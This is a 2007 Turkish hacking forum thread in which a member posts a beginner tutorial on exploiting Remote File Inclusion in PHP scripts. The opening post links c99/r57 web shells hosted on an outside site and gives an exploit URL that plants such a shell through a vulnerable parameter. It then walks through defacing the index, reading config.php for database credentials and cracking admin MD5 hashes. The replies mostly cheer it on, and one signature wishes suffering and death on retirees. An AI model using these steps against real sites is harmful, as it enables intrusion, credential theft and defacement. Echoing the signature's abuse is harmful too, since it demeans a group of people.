Yeni Başlayanlar İçin Hacking/5.Bölüm-RFI Nedir,Nasıl Yapılır?

Tahribat.com Forumları
line

Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
line

Yeni Başlayanlar İçin Hacking/5.Bölüm-RFI Nedir,Nasıl Yapılır?

17/Tem/07 16:58 Kısayol Şikayet Özel Mesaj

AntiOksidan

Kayıt Tarihi: 03/Ekim/2005

Bu saatte beni deli skti:D .Şu çok meşhur rfi yöntemini anlatmak istedim.Evet RFI nedir?RFI açılımı Remote File Inclusion dır. Uzaktan dosya dahil etmek yani. PHP scriptlerde bulunan bir açıktır. Siteye dosya eklememize yarar. Peki bu nasıl olur, yani bu açık ortaya nasıl çıkar? Programlama dillerinde değişkenler vardır ve bunların içinde bilgiler saklanır, öyle diyim. RFI açığı olan yerde, değişken tanımlı değildir, yani değişkenin bir değeri yoktur diyelim bizde o değişkeni kendi dosyamızla doldururuz (c99,r57 birazdan değineceğim) olayın mantığı bu :) Şimdi siteye nasıl dosya atıcaz? Gözat/upload olayını kastetmiyorum burada. RFI açığı bulunan scriptlere kendi shellimizi sokucaz önce shelleri verelim;
http://www.megaturks.by.ru/c99.txt
http://www.megaturks.by.ru/r57.txt
Biz burada c99 kullanıcaz siteler üzerinde işlem yaparken c99 daha idealdir,server rootlarken falan r57yi kullanırız. Bu sheller php file system objectlerdir, dosyalar üzerinde işlem yapmamıza yararlar. Şimdi bir sitede nasıl meydana gelir RFI açığı yani daha doğrusu ne şekilde kullanılır, görelim. www.milw0rm.com dan herhangi bir scriptteki RFI açığına bakalım;
[Path]cep/lib/pcltar.lib.php?g_pcltar_lib_dir=shell
Pathi değiştireceksiniz tabi sayfanın bulunduğu yer olacak orası bir de nereyi değiştiricez? tabi ki shell bölümünü! Shell yazan yere kendi shellimizin linkini yazalım yani ;
cep/lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.megaturks.by.ru/c99.txt?
Evet eğer açık varsa shellimize giricez,shell nasıl bi yer merak ediyosunuz di mi? Resmini de koyim ;
Yazma iznimizin olduğu noktalara ki resimlerde görülüyor indeximizi atabiliriz.Peki ya yazma iznimiz yoksa?Kaçıcak mıyız,tabi ki hayır...
Biz şu an tüm (herhangi bir siteye shell soktuğumuzu farzedin) dosyaları görebiliyoruz değil mi?
-evetE o zaman veritabanı bilgilerinin bulunduğu "config.php" dosyasını da görürüz :).Bu dosyayı bulun ve içindeki dbusername,dbpass gibi bilgileri bir yere not edin.
Yukarıda SQL diye bir kutucuk göreceksiniz.Ona tıklayın(şu yani);

config.php de ki bilgileri saklamıştık SQL bölümünde aşağıdaki resimdeki yerlere yazıyoruz;
Bağlandıktan sonra user şifrelerini bulabileceğimiz user adlı bölümü buluruz,orada ilk user falan admindir,onların şifreleri yanlarında yazar ama md5li bir şekildedir,md5leri bir md5 hash çözme sitesinden çözebilirsiniz.Evet arkadaşlar ben config.php dosyasını falan aramaya üşendim ,bakmadım bile: ) .Zaten önemli yerler buralarıydı ,umarım yeni arkadaşlara faydalı olmuştur,saat geç yorgunlukta var yazarken bi hata olduysa affola (dün gece yazdım bi problem çıktı eklenemedi ) :)
Not:Tarafımdan yazıldı çalıntı değil,bir de PitBull arkadaşıma teşekkürler,siteyi ve shelleri verdiği için yoksa ben üşenip site falan aramazdım ve resimsiz bir doküman çıkardı ortaya.

Alıntı yap
17/Tem/07 17:03 Kısayol Şikayet Özel Mesaj

renegadealien

Kayıt Tarihi: 23/Mart/2003

Güzel döküman olmuş hoca tebrikler...

10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.

Alıntı yap
17/Tem/07 17:13 Kısayol Şikayet Özel Mesaj

Tabela Fatihi
kaygusuz

Kayıt Tarihi: 06/Nisan/2007

emeğine sağlık iyi paylaşım saldırmak gerek :)

Türkiye’deki emekli yaşlı insanları sevmiyorum. Ailemde emekli olanlarda dahil. Geleceğimizin çalınmasına izin verdiler. Umarım ızdırap dolu bir çileli hayat çekip elveda deyip bu dünyadan gidersiniz. Siz gençleri zırnık düşünmediniz hayallerini mahvettiniz.14.500TL ile hiçbirşey almadan karnınızı doyurun gelecek nesili düşünmeden yaşadığınızı sanıp gidin bu dünyadan.

Alıntı yap
17/Tem/07 17:14 Kısayol Şikayet Özel Mesaj

kurdo

Kayıt Tarihi: 18/Temmuz/2005

höh imanım gevredi layn :\
güzel dökümal ama fakat açığın teorik kısmına yani açıklayıcı kısmına biraz daha değinseydin daha hoş görükürdü gözüme. ama pratik anlamda yararlı :)

kendinize ayığ olunuz

Alıntı yap
17/Tem/07 17:21 Kısayol Şikayet Özel Mesaj

CAGRI

Kayıt Tarihi: 06/Mart/2007

abi adres cubugunu silmişsin de titlelar duruyor xD

en cok nick dei$tiren mürid

Alıntı yap
17/Tem/07 17:23 Kısayol Şikayet Özel Mesaj

AntiOksidan

Kayıt Tarihi: 03/Ekim/2005

biliyorum abi kendi shellinizi sokun adamınkinden şey etmeyin bi nevi pratik :)

Alıntı yap
17/Tem/07 17:48 Kısayol Şikayet Özel Mesaj

inside
anonim6918524

Banlanmış Üye

Kayıt Tarihi: 16/Temmuz/2005

Güzel yazı olmuş hoca tebrikler.Konuyu zıplatalım görmeyen arkadaşlarda faydalansın :)

λ

Alıntı yap
17/Tem/07 18:19 Kısayol Şikayet Özel Mesaj

Cosmic

Kayıt Tarihi: 14/Haziran/2006

ellerine sağlık sabaha kadar bekledim eklemeni amq dayanamadım yattım sonra süpersin ;)

Bittik biz bittik

Alıntı yap
17/Tem/07 18:38 Kısayol Şikayet Özel Mesaj

---RudeboY---

Kayıt Tarihi: 27/Haziran/2007

Eyw hacı :D valla cosmice sormuştum araştır diodu ipne :D :P

Söz gümüşse, altın paradır...

Alıntı yap
17/Tem/07 21:06 Kısayol Şikayet Özel Mesaj

pitbull

Kayıt Tarihi: 05/Haziran/2007

eywalalh antioksid kardes ne demek her zqman ne zaman ıstersen soyle paylasımın ıcın elımden gelen yardımı ederım kardesım ;) elelrıne saglık guzel bı paylasım ;)

Alıntı yap
17/Tem/07 23:01 Kısayol Şikayet Özel Mesaj

Cosmic

Kayıt Tarihi: 14/Haziran/2006

---RudeboY--- bunu yazdı:
-----------------------------
Eyw hacı :D valla cosmice sormuştum araştır diodu ipne :D :P
-----------------------------
ne zmn sordun laaaaa hiç hatırlamıom sen php-fucker la uğraşırken ben bunla oğraşıodum o akşam ama bi boq yapamadık ;D

Bittik biz bittik

Alıntı yap

Toplam Hit: 6349 Toplam Mesaj: 18

Cevapla